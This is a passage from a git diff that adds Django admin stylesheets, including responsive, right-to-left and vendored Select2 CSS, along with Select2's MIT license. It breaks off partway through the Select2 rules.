+#nav-sidebar .module th, +#nav-sidebar .module caption { + padding-left: 16px; +} + +#nav-sidebar .module td { + white-space: nowrap; +} + +[dir="rtl"] #nav-sidebar .module th, +[dir="rtl"] #nav-sidebar .module caption { + padding-left: 8px; + padding-right: 16px; +} + +#nav-sidebar .current-app .section:link, +#nav-sidebar .current-app .section:visited { + color: #ffc; + font-weight: bold; +} + +#nav-sidebar .current-model { + background: #ffc; +} + +.main > #nav-sidebar + .content { + max-width: calc(100% - 23px); +} + +.main.shifted > #nav-sidebar + .content { + max-width: calc(100% - 299px); +} + +@media (max-width: 767px) { + #nav-sidebar, #toggle-nav-sidebar { + display: none; + } + + .main > #nav-sidebar + .content, + .main.shifted > #nav-sidebar + .content { + max-width: 100%; + } +} diff --git a/master/static/admin/css/responsive.css b/master/static/admin/css/responsive.css new file mode 100644 index 0000000..ef968c2 --- /dev/null +++ b/master/static/admin/css/responsive.css @@ -0,0 +1,1004 @@ +/* Tablets */ + +input[type="submit"], button { + -webkit-appearance: none; + appearance: none; +} + +@media (max-width: 1024px) { + /* Basic */ + + html { + -webkit-text-size-adjust: 100%; + } + + td, th { + padding: 10px; + font-size: 14px; + } + + .small { + font-size: 12px; + } + + /* Layout */ + + #container { + min-width: 0; + } + + #content { + padding: 20px 30px 30px; + } + + div.breadcrumbs { + padding: 10px 30px; + } + + /* Header */ + + #header { + flex-direction: column; + padding: 15px 30px; + justify-content: flex-start; + } + + #branding h1 { + margin: 0 0 8px; + font-size: 20px; + line-height: 1.2; + } + + #user-tools { + margin: 0; + font-weight: 400; + line-height: 1.85; + text-align: left; + } + + #user-tools a { + display: inline-block; + line-height: 1.4; + } + + /* Dashboard */ + + .dashboard #content { + width: auto; + } + + #content-related { + margin-right: -290px; + } + + .colSM #content-related { + margin-left: -290px; + } + + .colMS { + margin-right: 290px; + } + + .colSM { + margin-left: 290px; + } + + .dashboard .module table td a { + padding-right: 0; + } + + td .changelink, td .addlink { + font-size: 13px; + } + + /* Changelist */ + + #toolbar { + border: none; + padding: 15px; + } + + #changelist-search > div { + display: flex; + flex-wrap: nowrap; + max-width: 480px; + } + + #changelist-search label { + line-height: 22px; + } + + #toolbar form #searchbar { + flex: 1 0 auto; + width: 0; + height: 22px; + margin: 0 10px 0 6px; + } + + #toolbar form input[type=submit] { + flex: 0 1 auto; + } + + #changelist-search .quiet { + width: 0; + flex: 1 0 auto; + margin: 5px 0 0 25px; + } + + #changelist .actions { + display: flex; + flex-wrap: wrap; + padding: 15px 0; + } + + #changelist .actions.selected { + border: none; + } + + #changelist .actions label { + display: flex; + } + + #changelist .actions select { + background: #fff; + } + + #changelist .actions .button { + min-width: 48px; + margin: 0 10px; + } + + #changelist .actions span.all, + #changelist .actions span.clear, + #changelist .actions span.question, + #changelist .actions span.action-counter { + font-size: 11px; + margin: 0 10px 0 0; + } + + #changelist-filter { + width: 200px; + } + + .change-list .filtered .results, + .change-list .filtered .paginator, + .filtered #toolbar, + .filtered .actions, + + #changelist .paginator { + border-top-color: #eee; + } + + #changelist .results + .paginator { + border-top: none; + } + + /* Forms */ + + label { + font-size: 14px; + } + + .form-row input[type=text], + .form-row input[type=password], + .form-row input[type=email], + .form-row input[type=url], + .form-row input[type=tel], + .form-row input[type=number], + .form-row textarea, + .form-row select, + .form-row .vTextField { + box-sizing: border-box; + margin: 0; + padding: 6px 8px; + min-height: 36px; + font-size: 14px; + } + + .form-row select { + height: 36px; + } + + .form-row select[multiple] { + height: auto; + min-height: 0; + } + + fieldset .fieldBox { + float: none; + margin: 0 -10px; + padding: 0 10px; + } + + fieldset .fieldBox + .fieldBox { + margin-top: 10px; + padding-top: 10px; + border-top: 1px solid #eee; + } + + textarea { + max-width: 100%; + max-height: 120px; + } + + .aligned label { + padding-top: 6px; + } + + .aligned .related-lookup, + .aligned .datetimeshortcuts, + .aligned .related-lookup + strong { + align-self: center; + margin-left: 15px; + } + + form .aligned ul.radiolist { + margin-left: 2px; + } + + /* Related widget */ + + .related-widget-wrapper { + float: none; + } + + .related-widget-wrapper-link + .selector { + max-width: calc(100% - 30px); + margin-right: 15px; + } + + select + .related-widget-wrapper-link, + .related-widget-wrapper-link + .related-widget-wrapper-link { + margin-left: 10px; + } + + /* Selector */ + + .selector { + display: flex; + width: 100%; + } + + .selector .selector-filter { + display: flex; + align-items: center; + } + + .selector .selector-filter label { + margin: 0 8px 0 0; + } + + .selector .selector-filter input { + width: auto; + min-height: 0; + flex: 1 1; + } + + .selector-available, .selector-chosen { + width: auto; + flex: 1 1; + display: flex; + flex-direction: column; + } + + .selector select { + width: 100%; + flex: 1 0 auto; + margin-bottom: 5px; + } + + .selector ul.selector-chooser { + width: 26px; + height: 52px; + padding: 2px 0; + margin: auto 15px; + border-radius: 20px; + transform: translateY(-10px); + } + + .selector-add, .selector-remove { + width: 20px; + height: 20px; + background-size: 20px auto; + } + + .selector-add { + background-position: 0 -120px; + } + + .selector-remove { + background-position: 0 -80px; + } + + a.selector-chooseall, a.selector-clearall { + align-self: center; + } + + .stacked { + flex-direction: column; + max-width: 480px; + } + + .stacked > * { + flex: 0 1 auto; + } + + .stacked select { + margin-bottom: 0; + } + + .stacked .selector-available, .stacked .selector-chosen { + width: auto; + } + + .stacked ul.selector-chooser { + width: 52px; + height: 26px; + padding: 0 2px; + margin: 15px auto; + transform: none; + } + + .stacked .selector-chooser li { + padding: 3px; + } + + .stacked .selector-add, .stacked .selector-remove { + background-size: 20px auto; + } + + .stacked .selector-add { + background-position: 0 -40px; + } + + .stacked .active.selector-add { + background-position: 0 -40px; + } + + .active.selector-add:focus, .active.selector-add:hover { + background-position: 0 -140px; + } + + .stacked .active.selector-add:focus, .stacked .active.selector-add:hover { + background-position: 0 -60px; + } + + .stacked .selector-remove { + background-position: 0 0; + } + + .stacked .active.selector-remove { + background-position: 0 0; + } + + .active.selector-remove:focus, .active.selector-remove:hover { + background-position: 0 -100px; + } + + .stacked .active.selector-remove:focus, .stacked .active.selector-remove:hover { + background-position: 0 -20px; + } + + .help-tooltip, .selector .help-icon { + display: none; + } + + form .form-row p.datetime { + width: 100%; + } + + .datetime input { + width: 50%; + max-width: 120px; + } + + .datetime span { + font-size: 13px; + } + + .datetime .timezonewarning { + display: block; + font-size: 11px; + color: #999; + } + + .datetimeshortcuts { + color: #ccc; + } + + .form-row .datetime input.vDateField, .form-row .datetime input.vTimeField { + width: 75%; + } + + .inline-group { + overflow: auto; + } + + /* Messages */ + + ul.messagelist li { + padding-left: 55px; + background-position: 30px 12px; + } + + ul.messagelist li.error { + background-position: 30px 12px; + } + + ul.messagelist li.warning { + background-position: 30px 14px; + } + + /* Login */ + + .login #header { + padding: 15px 20px; + } + + .login #branding h1 { + margin: 0; + } + + /* GIS */ + + div.olMap { + max-width: calc(100vw - 30px); + max-height: 300px; + } + + .olMap + .clear_features { + display: block; + margin-top: 10px; + } + + /* Docs */ + + .module table.xfull { + width: 100%; + } + + pre.literal-block { + overflow: auto; + } +} + +/* Mobile */ + +@media (max-width: 767px) { + /* Layout */ + + #header, #content, #footer { + padding: 15px; + } + + #footer:empty { + padding: 0; + } + + div.breadcrumbs { + padding: 10px 15px; + } + + /* Dashboard */ + + .colMS, .colSM { + margin: 0; + } + + #content-related, .colSM #content-related { + width: 100%; + margin: 0; + } + + #content-related .module { + margin-bottom: 0; + } + + #content-related .module h2 { + padding: 10px 15px; + font-size: 16px; + } + + /* Changelist */ + + #changelist { + align-items: stretch; + flex-direction: column; + } + + #toolbar { + padding: 10px; + } + + #changelist-filter { + margin-left: 0; + } + + #changelist .actions label { + flex: 1 1; + } + + #changelist .actions select { + flex: 1 0; + width: 100%; + } + + #changelist .actions span { + flex: 1 0 100%; + } + + #changelist-filter { + position: static; + width: auto; + margin-top: 30px; + } + + .object-tools { + float: none; + margin: 0 0 15px; + padding: 0; + overflow: hidden; + } + + .object-tools li { + height: auto; + margin-left: 0; + } + + .object-tools li + li { + margin-left: 15px; + } + + /* Forms */ + + .form-row { + padding: 15px 0; + } + + .aligned .form-row, + .aligned .form-row > div { + display: flex; + flex-wrap: wrap; + max-width: 100vw; + } + + .aligned .form-row > div { + width: calc(100vw - 30px); + } + + textarea { + max-width: none; + } + + .vURLField { + width: auto; + } + + fieldset .fieldBox + .fieldBox { + margin-top: 15px; + padding-top: 15px; + } + + fieldset.collapsed .form-row { + display: none; + } + + .aligned label { + width: 100%; + padding: 0 0 10px; + } + + .aligned label:after { + max-height: 0; + } + + .aligned .form-row input, + .aligned .form-row select, + .aligned .form-row textarea { + flex: 1 1 auto; + max-width: 100%; + } + + .aligned .checkbox-row { + align-items: center; + } + + .aligned .checkbox-row input { + flex: 0 1 auto; + margin: 0; + } + + .aligned .vCheckboxLabel { + flex: 1 0; + padding: 1px 0 0 5px; + } + + .aligned label + p, + .aligned label + div.help, + .aligned label + div.readonly { + padding: 0; + margin-left: 0; + } + + .aligned p.file-upload { + margin-left: 0; + font-size: 13px; + } + + span.clearable-file-input { + margin-left: 15px; + } + + span.clearable-file-input label { + font-size: 13px; + padding-bottom: 0; + } + + .aligned .timezonewarning { + flex: 1 0 100%; + margin-top: 5px; + } + + form .aligned .form-row div.help { + width: 100%; + margin: 5px 0 0; + padding: 0; + } + + form .aligned ul { + margin-left: 0; + padding-left: 0; + } + + form .aligned ul.radiolist { + margin-right: 15px; + margin-bottom: -3px; + } + + form .aligned ul.radiolist li + li { + margin-top: 5px; + } + + /* Related widget */ + + .related-widget-wrapper { + width: 100%; + display: flex; + align-items: flex-start; + } + + .related-widget-wrapper .selector { + order: 1; + } + + .related-widget-wrapper > a { + order: 2; + } + + .related-widget-wrapper .radiolist ~ a { + align-self: flex-end; + } + + .related-widget-wrapper > select ~ a { + align-self: center; + } + + select + .related-widget-wrapper-link, + .related-widget-wrapper-link + .related-widget-wrapper-link { + margin-left: 15px; + } + + /* Selector */ + + .selector { + flex-direction: column; + } + + .selector > * { + float: none; + } + + .selector-available, .selector-chosen { + margin-bottom: 0; + flex: 1 1 auto; + } + + .selector select { + max-height: 96px; + } + + .selector ul.selector-chooser { + display: block; + float: none; + width: 52px; + height: 26px; + padding: 0 2px; + margin: 15px auto 20px; + transform: none; + } + + .selector ul.selector-chooser li { + float: left; + } + + .selector-remove { + background-position: 0 0; + } + + .active.selector-remove:focus, .active.selector-remove:hover { + background-position: 0 -20px; + } + + .selector-add { + background-position: 0 -40px; + } + + .active.selector-add:focus, .active.selector-add:hover { + background-position: 0 -60px; + } + + /* Inlines */ + + .inline-group[data-inline-type="stacked"] .inline-related { + border: 2px solid #eee; + border-radius: 4px; + margin-top: 15px; + overflow: auto; + } + + .inline-group[data-inline-type="stacked"] .inline-related > * { + box-sizing: border-box; + } + + .inline-group[data-inline-type="stacked"] .inline-related + .inline-related { + margin-top: 30px; + } + + .inline-group[data-inline-type="stacked"] .inline-related .module { + padding: 0 10px; + } + + .inline-group[data-inline-type="stacked"] .inline-related .module .form-row:last-child { + border-bottom: none; + } + + .inline-group[data-inline-type="stacked"] .inline-related h3 { + padding: 10px; + border-top-width: 0; + border-bottom-width: 2px; + display: flex; + flex-wrap: wrap; + align-items: center; + } + + .inline-group[data-inline-type="stacked"] .inline-related h3 .inline_label { + margin-right: auto; + } + + .inline-group[data-inline-type="stacked"] .inline-related h3 span.delete { + float: none; + flex: 1 1 100%; + margin-top: 5px; + } + + .inline-group[data-inline-type="stacked"] .aligned .form-row > div:not([class]) { + width: 100%; + } + + .inline-group[data-inline-type="stacked"] .aligned label { + width: 100%; + } + + .inline-group[data-inline-type="stacked"] div.add-row { + margin-top: 15px; + border: 1px solid #eee; + border-radius: 4px; + } + + .inline-group div.add-row, + .inline-group .tabular tr.add-row td { + padding: 0; + } + + .inline-group div.add-row a, + .inline-group .tabular tr.add-row td a { + display: block; + padding: 8px 10px 8px 26px; + background-position: 8px 9px; + } + + /* Submit row */ + + .submit-row { + padding: 10px 10px 0; + margin: 0 0 15px; + display: flex; + flex-direction: column; + } + + .submit-row > * { + width: 100%; + } + + .submit-row input, .submit-row input.default, .submit-row a, .submit-row a.closelink { + float: none; + margin: 0 0 10px; + text-align: center; + } + + .submit-row a.closelink { + padding: 10px 0; + } + + .submit-row p.deletelink-box { + order: 4; + } + + /* Messages */ + + ul.messagelist li { + padding-left: 40px; + background-position: 15px 12px; + } + + ul.messagelist li.error { + background-position: 15px 12px; + } + + ul.messagelist li.warning { + background-position: 15px 14px; + } + + /* Paginator */ + + .paginator .this-page, .paginator a:link, .paginator a:visited { + padding: 4px 10px; + } + + /* Login */ + + body.login { + padding: 0 15px; + } + + .login #container { + width: auto; + max-width: 480px; + margin: 50px auto; + } + + .login #header, + .login #content { + padding: 15px; + } + + .login #content-main { + float: none; + } + + .login .form-row { + padding: 0; + } + + .login .form-row + .form-row { + margin-top: 15px; + } + + .login .form-row label { + display: block; + margin: 0 0 5px; + padding: 0; + line-height: 1.2; + } + + .login .submit-row { + padding: 15px 0 0; + } + + .login br, .login .submit-row label { + display: none; + } + + .login .submit-row input { + margin: 0; + text-transform: uppercase; + } + + .errornote { + margin: 0 0 20px; + padding: 8px 12px; + font-size: 13px; + } + + /* Calendar and clock */ + + .calendarbox, .clockbox { + position: fixed !important; + top: 50% !important; + left: 50% !important; + transform: translate(-50%, -50%); + margin: 0; + border: none; + overflow: visible; + } + + .calendarbox:before, .clockbox:before { + content: ''; + position: fixed; + top: 50%; + left: 50%; + width: 100vw; + height: 100vh; + background: rgba(0, 0, 0, 0.75); + transform: translate(-50%, -50%); + } + + .calendarbox > *, .clockbox > * { + position: relative; + z-index: 1; + } + + .calendarbox > div:first-child { + z-index: 2; + } + + .calendarbox .calendar, .clockbox h2 { + border-radius: 4px 4px 0 0; + overflow: hidden; + } + + .calendarbox .calendar-cancel, .clockbox .calendar-cancel { + border-radius: 0 0 4px 4px; + overflow: hidden; + } + + .calendar-shortcuts { + padding: 10px 0; + font-size: 12px; + line-height: 12px; + } + + .calendar-shortcuts a { + margin: 0 4px; + } + + .timelist a { + background: #fff; + padding: 4px; + } + + .calendar-cancel { + padding: 8px 10px; + } + + .clockbox h2 { + padding: 8px 15px; + } + + .calendar caption { + padding: 10px; + } + + .calendarbox .calendarnav-previous, .calendarbox .calendarnav-next { + z-index: 1; + top: 10px; + } + + /* History */ + + table#change-history tbody th, table#change-history tbody td { + font-size: 13px; + word-break: break-word; + } + + table#change-history tbody th { + width: auto; + } + + /* Docs */ + + table.model tbody th, table.model tbody td { + font-size: 13px; + word-break: break-word; + } +} diff --git a/master/static/admin/css/responsive_rtl.css b/master/static/admin/css/responsive_rtl.css new file mode 100644 index 0000000..66d3c2f --- /dev/null +++ b/master/static/admin/css/responsive_rtl.css @@ -0,0 +1,80 @@ +/* TABLETS */ + +@media (max-width: 1024px) { + [dir="rtl"] .colMS { + margin-right: 0; + } + + [dir="rtl"] #user-tools { + text-align: right; + } + + [dir="rtl"] #changelist .actions label { + padding-left: 10px; + padding-right: 0; + } + + [dir="rtl"] #changelist .actions select { + margin-left: 0; + margin-right: 15px; + } + + [dir="rtl"] .change-list .filtered .results, + [dir="rtl"] .change-list .filtered .paginator, + [dir="rtl"] .filtered #toolbar, + [dir="rtl"] .filtered div.xfull, + [dir="rtl"] .filtered .actions, + [dir="rtl"] #changelist-filter { + margin-left: 0; + } + + [dir="rtl"] .inline-group ul.tools a.add, + [dir="rtl"] .inline-group div.add-row a, + [dir="rtl"] .inline-group .tabular tr.add-row td a { + padding: 8px 26px 8px 10px; + background-position: calc(100% - 8px) 9px; + } + + [dir="rtl"] .related-widget-wrapper-link + .selector { + margin-right: 0; + margin-left: 15px; + } + + [dir="rtl"] .selector .selector-filter label { + margin-right: 0; + margin-left: 8px; + } + + [dir="rtl"] .object-tools li { + float: right; + } + + [dir="rtl"] .object-tools li + li { + margin-left: 0; + margin-right: 15px; + } + + [dir="rtl"] .dashboard .module table td a { + padding-left: 0; + padding-right: 16px; + } +} + +/* MOBILE */ + +@media (max-width: 767px) { + [dir="rtl"] .aligned .related-lookup, + [dir="rtl"] .aligned .datetimeshortcuts { + margin-left: 0; + margin-right: 15px; + } + + [dir="rtl"] .aligned ul { + margin-right: 0; + } + + [dir="rtl"] #changelist-filter { + margin-left: 0; + margin-right: 0; + } +} diff --git a/master/static/admin/css/rtl.css b/master/static/admin/css/rtl.css new file mode 100644 index 0000000..a40aad0 --- /dev/null +++ b/master/static/admin/css/rtl.css @@ -0,0 +1,249 @@ +body { + direction: rtl; +} + +/* LOGIN */ + +.login .form-row { + float: right; +} + +.login .form-row label { + float: right; + padding-left: 0.5em; + padding-right: 0; + text-align: left; +} + +.login .submit-row { + clear: both; + padding: 1em 9.4em 0 0; +} + +/* GLOBAL */ + +th { + text-align: right; +} + +.module h2, .module caption { + text-align: right; +} + +.module ul, .module ol { + margin-left: 0; + margin-right: 1.5em; +} + +.viewlink, .addlink, .changelink { + padding-left: 0; + padding-right: 16px; + background-position: 100% 1px; +} + +.deletelink { + padding-left: 0; + padding-right: 16px; + background-position: 100% 1px; +} + +.object-tools { + float: left; +} + +thead th:first-child, +tfoot td:first-child { + border-left: none; +} + +/* LAYOUT */ + +#user-tools { + right: auto; + left: 0; + text-align: left; +} + +div.breadcrumbs { + text-align: right; +} + +#content-main { + float: right; +} + +#content-related { + float: left; + margin-left: -300px; + margin-right: auto; +} + +.colMS { + margin-left: 300px; + margin-right: 0; +} + +/* SORTABLE TABLES */ + +table thead th.sorted .sortoptions { + float: left; +} + +thead th.sorted .text { + padding-right: 0; + padding-left: 42px; +} + +/* dashboard styles */ + +.dashboard .module table td a { + padding-left: .6em; + padding-right: 16px; +} + +/* changelists styles */ + +.change-list .filtered table { + border-left: none; + border-right: 0px none; +} + +#changelist-filter { + border-left: none; + border-right: none; + margin-left: 0; + margin-right: 30px; +} + +#changelist-filter li.selected { + border-left: none; + padding-left: 10px; + margin-left: 0; + border-right: 5px solid #eaeaea; + padding-right: 10px; + margin-right: -15px; +} + +#changelist table tbody td:first-child, #changelist table tbody th:first-child { + border-right: none; + border-left: none; +} + +/* FORMS */ + +.aligned label { + padding: 0 0 3px 1em; + float: right; +} + +.submit-row { + text-align: left +} + +.submit-row p.deletelink-box { + float: right; +} + +.submit-row input.default { + margin-left: 0; +} + +.vDateField, .vTimeField { + margin-left: 2px; +} + +.aligned .form-row input { + margin-left: 5px; +} + +form .aligned p.help, form .aligned div.help { + clear: right; +} + +form .aligned ul { + margin-right: 163px; + margin-left: 0; +} + +form ul.inline li { + float: right; + padding-right: 0; + padding-left: 7px; +} + +input[type=submit].default, .submit-row input.default { + float: left; +} + +fieldset .fieldBox { + float: right; + margin-left: 20px; + margin-right: 0; +} + +.errorlist li { + background-position: 100% 12px; + padding: 0; +} + +.errornote { + background-position: 100% 12px; + padding: 10px 12px; +} + +/* WIDGETS */ + +.calendarnav-previous { + top: 0; + left: auto; + right: 10px; +} + +.calendarnav-next { + top: 0; + right: auto; + left: 10px; +} + +.calendar caption, .calendarbox h2 { + text-align: center; +} + +.selector { + float: right; +} + +.selector .selector-filter { + text-align: right; +} + +.inline-deletelink { + float: left; +} + +form .form-row p.datetime { + overflow: hidden; +} + +.related-widget-wrapper { + float: right; +} + +/* MISC */ + +.inline-related h2, .inline-group h2 { + text-align: right +} + +.inline-related h3 span.delete { + padding-right: 20px; + padding-left: inherit; + left: 10px; + right: inherit; + float:left; +} + +.inline-related h3 span.delete label { + margin-left: inherit; + margin-right: 2px; +} diff --git a/master/static/admin/css/vendor/select2/LICENSE-SELECT2.md b/master/static/admin/css/vendor/select2/LICENSE-SELECT2.md new file mode 100644 index 0000000..8cb8a2b --- /dev/null +++ b/master/static/admin/css/vendor/select2/LICENSE-SELECT2.md @@ -0,0 +1,21 @@ +The MIT License (MIT) + +Copyright (c) 2012-2017 Kevin Brown, Igor Vaynberg, and Select2 contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/master/static/admin/css/vendor/select2/select2.css b/master/static/admin/css/vendor/select2/select2.css new file mode 100644 index 0000000..750b320 --- /dev/null +++ b/master/static/admin/css/vendor/select2/select2.css @@ -0,0 +1,481 @@ +.select2-container { + box-sizing: border-box; + display: inline-block; + margin: 0; + position: relative; + vertical-align: middle; } + .select2-container .select2-selection--single { + box-sizing: border-box; + cursor: pointer; + display: block; + height: 28px; + user-select: none; + -webkit-user-select: none; } + .select2-container .select2-selection--single .select2-selection__rendered { + display: block; + padding-left: 8px; + padding-right: 20px; + overflow: hidden; + text-overflow: ellipsis; + white-space: nowrap; } + .select2-container .select2-selection--single .select2-selection__clear { + position: relative; } + .select2-container[dir="rtl"] .select2-selection--single .select2-selection__rendered { + padding-right: 8px; + padding-left: 20px; } + .select2-container .select2-selection--multiple { + box-sizing: border-box; + cursor: pointer; + display: block; + min-height: 32px; + user-select: none; + -webkit-user-select: none; } + .select2-container .select2-selection--multiple .select2-selection__rendered { + display: inline-block; + overflow: hidden; + padding-left: 8px; + text-overflow: ellipsis; + white-space: nowrap; } + .select2-container .select2-search--inline { + float: left; } + .select2-container .select2-search--inline .select2-search__field { + box-sizing: border-box; + border: none; + font-size: 100%; + margin-top: 5px; + padding: 0; } + .select2-container .select2-search--inline .select2-search__field::-webkit-search-cancel-button { + -webkit-appearance: none; } + +.select2-dropdown { + background-color: white; + border: 1px solid #aaa; + border-radius: 4px; + box-sizing: border-box; + display: block; + position: absolute; + left: -100000px; + width: 100%; + z-index: 1051; } + +.select2-results { + display: block; } + +.select2-results__options { + list-style: none; + margin: 0; + padding: 0; } + +.select2-results__option { + padding: 6px; + user-select: none; + -webkit-user-select: none; } + .select2-results__option[aria-selected] { + cursor: pointer; } + +.select2-container--open .select2-dropdown { + left: 0; } + +.select2-container--open .select2-dropdown--above { + border-bottom: none; + border-bottom-left-radius: 0; + border-bottom-right-radius: 0; } + +.select2-container--open .select2-dropdown--below { + border-top: none; + border-top-left-radius: 0; + border-top-right-radius: 0; } + +.select2-search--dropdown { + display: block; + padding: 4px; } + .select2-search--dropdown .select2-search__field { + padding: 4px; + width: 100%; + box-sizing: border-box; } + .select2-search--dropdown .select2-search__field::-webkit-search-cancel-button { + -webkit-appearance: none; } + .select2-search--dropdown.select2-search--hide { + display: none; } + +.select2-close-mask { + border: 0; + margin: 0; + padding: 0; + display: block; + position: fixed; + left: 0; + top: 0; + min-height: 100%; + min-width: 100%; + height: auto; + width: auto; + opacity: 0; + z-index: 99; + background-color: #fff; + filter: alpha(opacity=0); } + +.select2-hidden-accessible { + border: 0 !important; + clip: rect(0 0 0 0) !important; + -webkit-clip-path: inset(50%) !important; + clip-path: inset(50%) !important; + height: 1px !important; + overflow: hidden !important; + padding: 0 !important; + position: absolute !important; + width: 1px !important; + white-space: nowrap !important; } + +.select2-container--default .select2-selection--single { + background-color: #fff; + border: 1px solid #aaa; + border-radius: 4px; } + .select2-container--default .select2-selection--single .select2-selection__rendered { + color: #444; + line-height: 28px; } + .select2-container--default .select2-selection--single .select2-selection__clear { + cursor: pointer; + float: right; + font-weight: bold; } + .select2-container--default .select2-selection--single .select2-selection__placeholder { + color: #999; } + .select2-container--default .select2-selection--single .select2-selection__arrow { + height: 26px; + position: absolute; + top: 1px; + right: 1px; + width: 20px; } + .select2-container--default .select2-selection--single .select2-selection__arrow b { + border-color: #888 transparent transparent transparent; + border-style: solid; + border-width: 5px 4px 0 4px; + height: 0; + left: 50%; + margin-left: -4px; + margin-top: -2px; + position: absolute; + top: 50%; + width: 0; } + +.select2-container--default[dir="rtl"] .select2-selection--single .select2-selection__clear { + float: left; } + +.select2-container--default[dir="rtl"] .select2-selection--single .select2-selection__arrow { + left: 1px; + right: auto; } + +.select2-container--default.select2-container--disabled .select2-selection--single { + background-color: #eee; + cursor: default; } + .select2-container--default.select2-container--disabled .select2-selection--single .select2-selection__clear { + display: none; } + +.select2-container--default.select2-container--open .select2-selection--single .select2-selection__arrow b { + border-color: transparent transparent #888 transparent; + border-width: 0 4px 5px 4px; } + +.select2-container--default .select2-selection--multiple { + background-color: white; + border: 1px solid #aaa; + border-radius: 4px; + cursor: text; } + .select2-container--default .select2-selection--multiple .select2-selection__rendered { + box-sizing: border-box; + list-style: none; + margin: 0; + padding: 0 5px; + width: 100%; } + .select2-container--default .select2-selection--multiple .select2-selection__rendered li { + list-style: none; } + .select2-container--default .select2-selection--multiple .select2-selection__clear { + cursor: pointer; + float: right; + font-weight: bold; + margin-top: 5px; + margin-right: 10px; + padding: 1px; } + .select2-container--default .select2-selection--multiple .select2-selection__choice { + background-color: #e4e4e4; + border: 1px solid #aaa; + border-radius: 4px; + cursor: default; + float: left; + margin-right: 5px; + margin-top: 5px; + padding: 0 5px; } + .select2-container--default .select2-selection--multiple .select2-selection__choice__remove { + color: #999; + cursor: pointer; + display: inline-block; + font-weight: bold; + margin-right: 2px; } + .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover { + color: #333; } + +.select2-container--default[dir="rtl"] .select2-selection--multiple .select2-selection__choice, .select2-container--default[dir="rtl"] .select2-selection--multiple .select2-search--inline { + float: right; } + +.select2-container--default[dir="rtl"] .select2-selection--multiple .select2-selection__choice { + margin-left: 5px; + margin-right: auto; } + +.select2-container--default[dir="rtl"] .select2-selection--multiple .select2-selection__choice__remove { + margin-left: 2px; + margin-right: auto; } + +.select2-container--default.select2-container--focus .select2-selection--multiple { + border: solid black 1px; + outline: 0; } + +.select2-container--default.select2-container--disabled .select2-selection--multiple { + background-color: #eee; + cursor: default; } + +.select2-container--default.select2-container--disabled .select2-selection__choice__remove { + display: none; } + +.select2-container--default.select2-container--open.select2-container--above .select2-selection--single, .select2-container--default.select2-container--open.select2-container--above .select2-selection--multiple { + border-top-left-radius: 0; + border-top-right-radius: 0; } + +.select2-container--default.select2-container--open.select2-container--below .select2-selection--single, .select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple { + border-bottom-left-radius: 0; + border-bottom-right-radius: 0; } + +.select2-container--default .select2-search--dropdown .select2-search__field { + border: 1px solid #aaa; } + +.select2-container--default .select2-search--inline .select2-search__field { + background: transparent; + border: none; + outline: 0; + box-shadow: none; + -webkit-appearance: textfield; } + +.select2-container--default .select2-results > .select2-results__options { + max-height: 200px; + overflow-y: auto; } + +.select2-container--default .select2-results__option[role=group] { + padding: 0; } + +.select2-container--default .select2-results__option[aria-disabled=true] { + color: #999; } + +.select2-container--default .select2-results__option[aria-selected=true] { + background-color: #ddd; } + +.select2-container--default .select2-results__option .select2-results__option { + padding-left: 1em; } + .select2-container--default .select2-results__option .select2-results__option .select2-results__group { + padding-left: 0; } + .select2-container--default .select2-results__option .select2-results__option .select2-results__option { + margin-left: -1em; + padding-left: 2em; } + .select2-container--default .select2-results__option .select2-results__option .select2-results__option .select2-results__option { + margin-left: -2em; + padding-left: 3em; } + .select2-container--default .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option { + margin-left: -3em; + padding-left: 4em; } + .select2-container--default .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option { + margin-left: -4em; + padding-left: 5em; } + .select2-container--default .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option { + margin-left: -5em; + padding-left: 6em; } + +.select2-container--default .select2-results__option--highlighted[aria-selected] { + background-color: #5897fb; + color: white; } + +.select2-container--default .select2-results__group { + cursor: default; + display: block; + padding: 6px; } + +.select2-container--classic .select2-selection--single { + background-color: #f7f7f7; + border: 1px solid #aaa; + border-radius: 4px; + outline: 0; + background-image: -webkit-linear-gradient(top, white 50%, #eeeeee 100%); + background-image: -o-linear-gradient(top, white 50%, #eeeeee 100%); + background-image: linear-gradient(to bottom, white 50%, #eeeeee 100%); + background-repeat: repeat-x; + filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFFFFFFF', endColorstr='#FFEEEEEE', GradientType=0); } + .select2-container--classic .select2-selection--single:focus { + border: 1px solid #5897fb; } + .select2-container--classic .select2-selection--single .select2-selection__rendered { + color: #444; + line-height: 28px; } + .select2-container--classic .select2-selection--single .select2-selection__clear { + cursor: pointer; + float: right; + font-weight: bold; + margin-right: 10px; } + .select2-container--classic .select2-selection--single .select2-selection__placeholder { + color: #999; } + .select2-container--classic .select2-selection--single .select2-selection__arrow { + background-color: #ddd; + border: none; + border-left: 1px solid #aaa; + border-top-right-radius: 4px; + border-bottom-right-radius: 4px; + height: 26px; + position: absolute; + top: 1px; + right: 1px; + width: 20px; + background-image: -webkit-linear-gradient(top, #eeeeee 50%, #cccccc 100%); + background-image: -o-linear-gradient(top, #eeeeee 50%, #cccccc 100%); + background-image: linear-gradient(to bottom, #eeeeee 50%, #cccccc 100%); + background-repeat: repeat-x; + filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFEEEEEE', endColorstr='#FFCCCCCC', GradientType=0); } + .select2-container--classic .select2-selection--single .select2-selection__arrow b { + 